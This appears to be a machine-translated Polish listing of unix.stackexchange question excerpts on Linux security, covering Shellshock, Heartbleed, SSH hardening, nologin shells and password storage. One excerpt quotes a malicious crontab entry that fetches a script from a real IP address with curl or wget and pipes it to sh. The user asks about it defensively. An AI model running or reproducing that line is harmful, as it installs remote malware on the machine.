Niezbędne treści związane z bezpieczeństwem komputerowym, tj. Treści dotyczące zasad, mechanizmów itp. Zapewniają, że dane nie wyciekają ani nie są uszkodzone, a usługi są dostępne we wszystkich okolicznościach.
Jeśli od jakiegoś czasu obserwujesz unix.stackexchange.com, powinieneś wiedzieć, że pozostawienie zmiennej niecytowanej w kontekście listy (jak w echo $var) w powłokach Bourne / POSIX (wyjątek to zsh) ma bardzo szczególne znaczenie i nie należy tego robić, chyba że masz ku temu dobry powód. To omówiono obszernie w wielu Q & …
Technicznie, chyba że pamjest skonfigurowany do sprawdzania powłoki, pam_shellsżadna z nich nie może faktycznie uniemożliwić zalogowania się, jeśli nie jesteś w powłoce. W moim systemie mają nawet różne rozmiary, więc podejrzewam, że faktycznie coś robią. Jaka jest różnica? dlaczego oboje istnieją? Dlaczego miałbym używać jednego nad drugim? -rwxr-xr-x 1 root …
Czy możliwe jest zainfekowanie mojego Linux-a złośliwym oprogramowaniem? Nie słyszałem o tym, żeby zdarzyło się to komuś, kogo znam, i słyszałem kilka razy, że nie jest to możliwe. Czy to prawda? Jeśli tak, o co chodzi z oprogramowaniem antywirusowym (zabezpieczającym) dla systemu Linux?
Trochę kontekstu na temat błędu: CVE-2014-6271 Bash obsługuje eksportowanie nie tylko zmiennych powłoki, ale także funkcji powłoki do innych instancji bash, poprzez środowisko procesowe do (pośrednich) procesów potomnych. Obecne wersje bash używają zmiennej środowiskowej nazwanej nazwą funkcji i definicji funkcji rozpoczynającej się od „() {” w wartości zmiennej do propagowania …
Chciałbym mieć konto root bezpiecznie, nawet jeśli mój nieuprzywilejowany użytkownik jest zagrożony. W systemie Ubuntu domyślnie można używać sudo tylko ze względów bezpieczeństwa. Nie jestem jednak pewien, czy jest to bezpieczniejsze niż logowanie przy użyciu konsoli tekstowej. Jest zbyt wiele rzeczy, które mogą pójść nie tak, jeśli osoba atakująca może …
Nigdy nie należy wklejać z Internetu do terminala . Zamiast tego należy wkleić do edytora tekstu, sprawdzić polecenie, a następnie wkleić do terminala. Zgadza się, ale co jeśli Vim jest moim edytorem tekstu? Czy można sfałszować treść, która przełącza Vima w tryb poleceń i wykonuje złośliwe polecenie?
CVE-2014-0160 alias Heartbleed jest podatnością w OpenSSL. Wygląda przerażająco. Jak ustalić, czy mam na to wpływ? Jeśli mnie to dotknie, co muszę zrobić? Najwyraźniej aktualizacja nie wystarczy.
Dostrzegam dziwną (według mnie) rzecz dotyczącą haseł. Na przykład, jeśli wprowadzę nieprawidłowe hasło podczas logowania, nastąpi kilka sekund opóźnienia, zanim system mi o tym powie. Gdy próbuję sudoużyć niepoprawnego hasła, musiałbym również poczekać, aż powłoka powie „Przepraszam, spróbuj ponownie”. Zastanawiam się, dlaczego tak długo „rozpoznaje się” nieprawidłowe hasło? Zostało to …
Przez lata (od 2005 r.) Widziałem dzienniki dziwnych losowych żądań DNS wykonanych na wielu serwerach DNS / BIND, które prowadziłem. May 7 12:13:50 1.1.1.1 named[63742]: client 1.1.1.2#24123 (verxkgiicjmcnxg): view internal: query: verxkgiicjmcnxg IN A + (1.1.1.1) May 7 12:13:50 1.1.1.1 named[63742]: client 1.1.1.2#29159 (epqoaqsayo): view internal: query: epqoaqsayo IN A …
W systemie Linux mogę utworzyć skrót hasłowy SHA1 przy użyciu sha1pass mypassword. Czy istnieje podobne narzędzie wiersza poleceń, które pozwala mi tworzyć sha512skróty? To samo pytanie dla Bcrypti PBKDF2.
Wszyscy w Internecie radzą wyłączyć logowanie roota przez SSH, ponieważ jest to zła praktyka i dziura w systemie bezpieczeństwa, ale nikt nie wyjaśnia, dlaczego tak jest. Co jest takiego niebezpiecznego w włączaniu logowania roota (szczególnie przy wyłączonym logowaniu się hasłem)? Jaka jest różnica między nazwą użytkownika symbolu X a hasłem …
Wiem co to robi, ale nie wiem dlaczego . Jakim atakom zapobiega to? Czy ma to znaczenie dla wszelkiego rodzaju metod uwierzytelniania? (oparty na hoście, hasło, klucz publiczny, klawiatura interaktywna ...)
W moim /etc/passwdpliku widzę, że www-dataużytkownik używany przez Apache, a także różnego rodzaju użytkownicy systemu, mają powłokę logowania jako /usr/sbin/nologinlub /bin/false. Na przykład oto wybór linii: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin games:x:5:60:games:/usr/games:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin syslog:x:101:104::/home/syslog:/bin/false whoopsie:x:109:116::/nonexistent:/bin/false mark:x:1000:1000:mark,,,:/home/mark:/bin/bash W związku z tym, jeśli spróbuję zamienić się na któregokolwiek z tych użytkowników (co czasami chciałbym …
Patrzyłem na klawiaturę i wpisałem hasło, ponieważ myślałem, że już wpisałem swoją nazwę użytkownika. Nacisnąłem Enter, a kiedy zapytałem o hasło, nacisnąłem Ctrl+ c. Czy powinienem podjąć środki ostrożności, aby upewnić się, że hasło nie jest gdzieś zapisane jako zwykły tekst, czy powinienem je zmienić? To też było na tty …
Mam uzyskiwać dostęp do serwera, aby połączyć serwery pośrednie i tymczasowe firmy z naszą pętlą wdrażania. Administrator po swojej stronie skonfigurował te dwie instancje, a następnie utworzył użytkownika na serwerze dla SSH w as. Do tego jestem przyzwyczajony. Teraz myślę, że wyślę im mój klucz publiczny, który można umieścić w …
Zgodnie z artykułem rapid7 istnieje kilka wrażliwych wersji Samby umożliwiających zdalne wykonanie kodu w systemach Linux: Podczas gdy ransomworm WannaCry wpłynął na systemy Windows i był łatwy do zidentyfikowania, przy wyraźnych krokach naprawczych, luka w Sambie wpłynie na systemy Linux i Unix i może stanowić poważne techniczne przeszkody w uzyskaniu …
Moja maszyna jest serwerem, więc chcę zignorować połączenia z moim serwerem (np. Gdy ktoś odwiedza moją stronę internetową). Chcę, aby mój serwer wysyłał tylko połączenia / żądania do innych miejsc. Jak wyświetlić tylko te połączenia wychodzące? EDYCJA: Jestem nowy w tego typu rzeczach. Próbuję tylko sprawdzić, czy wysyłane są cokolwiek …
Jakiś czas temu zauważyłem, że nazwy użytkowników i hasła podane curljako argumenty wiersza poleceń nie pojawiają się w psdanych wyjściowych (chociaż oczywiście mogą pojawiać się w twojej historii bashów). Podobnie nie pojawiają się w /proc/PID/cmdline. (Można jednak określić długość połączonego argumentu nazwa użytkownika / hasło.) Pokaz poniżej: [root@localhost ~]# nc …
Mamy mały problem na serwerze. Chcemy, aby niektórzy użytkownicy mogli np. Być sudorootem, ale z zastrzeżeniem, że użytkownik nie może zmienić hasła roota. Oznacza to, że nadal możemy zalogować się na tym serwerze i zostać rootem bez względu na to, co zrobią inni użytkownicy. Czy to jest możliwe?
Czy jest jakiś sposób na powstrzymanie dodawania polecenia do twojej historii? Mam polecenie, które chcę trzymać z dala od mojego pliku historii, i tak naprawdę nie dbam o to, aby było tam, gdy przeszukuję historię zapisaną w pamięci, ale to mniej niepokoi. Czy jest jakiś sposób, aby temu zapobiec, czy …
Obecnie pracuję zdalnie dla wielu organizacji, które wymagają regularnego uzyskiwania dostępu do swoich serwerów w celu konserwacji i aktualizacji. Czy mogę bezpiecznie dodać mój publiczny klucz SSH RSA do .ssh/authorized_keyspliku, aby umożliwić mi znacznie szybsze logowanie / bez konieczności wyszukiwania haseł? Działam przy założeniu, że wygenerowanie klucza prywatnego z klucza …
Po przeczytaniu tego przewodnika próbuję przenieść niektóre foldery (takie jak /vari /home) na osobną partycję: 3.2.1 Wybierz inteligentny schemat partycji Udało mi się przenieść jeden folder z powodzeniem zgodnie z tym przewodnikiem. Jednak wydaje się, że to nie działa w przypadku wielu folderów, a wszystkie moje foldery są zrzucane na …
Chciałem dodać coś do mojego głównego pliku crontab na moim Raspberry Pi i znalazłem wpis, który wydaje mi się podejrzany, szukając części tego w Google nic nie znalazłem. Wpis Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Zawartość http://103.219.112.66:8000/i.shto: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir …
Używam Chromium tak: chromium --no-sandbox Robię to, ponieważ uruchamiam Debian Squeeze na kontenerze VM OpenVZ i jest to jedyny sposób, w jaki mogę go uruchomić. Chociaż wciąż czytam, to jest okropne . Ale chcę wiedzieć, dlaczego dokładnie. Czy ktoś może mi to wytłumaczyć? Czy ktoś musi włamać się do komputera, …
To bardziej bezczynna ciekawość niż cokolwiek innego. Mój przyjaciel zapytał mnie „jaki zakres portów może używać tylko root w Linuksie?” Powiedziałem mu, że 0-1024 są ograniczone. Potem zapytał mnie, dlaczego tak jest i ... byłem zagubiony. Nie mam pojęcia. Czy istnieje powód, dla którego porty te są ograniczone, a 1025-65535 …
Mój plik .muttrc wygląda coś jak ten jeden lub zobacz poniżej spojrzenie. Waham się z hasłem. Jak przechowywać hasło, aby z niego korzystać mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
Wygenerowałem i pobrałem .pemklucz prywatny z AWS. Jednak aby użyć Putty do połączenia z maszyną wirtualną, muszę mieć ten klucz w .ppkformacie. Proces konwersji opisano szczegółowo w około 20 wierszach: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Używam Linux Mint (dystrybucja Ubuntu) i wiem, że mogę używać puttygen w terminalu. Nie mam jednak pojęcia, jak korzystać …
Mam proces, który nasłuchuje 2 portów: 45136 / tcp i 37208 / udp (w rzeczywistości zakładam, że jest to ten sam proces). Ale netstat nie zwraca żadnego pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Ten sam wynik z „grep 37208”. Próbowałem też lsof: lsof …
Mam drzewo katalogów, które chciałbym zniszczyć za pomocą narzędzia Linux „shred”. Niestety, niszczenie nie ma -Ropcji niszczenia rekurencyjnego. Jak mogę zniszczyć rekurencyjnie całe drzewo katalogów?
Używamy plików cookie i innych technologii śledzenia w celu poprawy komfortu przeglądania naszej witryny, aby wyświetlać spersonalizowane treści i ukierunkowane reklamy, analizować ruch w naszej witrynie, i zrozumieć, skąd pochodzą nasi goście.
Kontynuując, wyrażasz zgodę na korzystanie z plików cookie i innych technologii śledzenia oraz potwierdzasz, że masz co najmniej 16 lat lub zgodę rodzica lub opiekuna.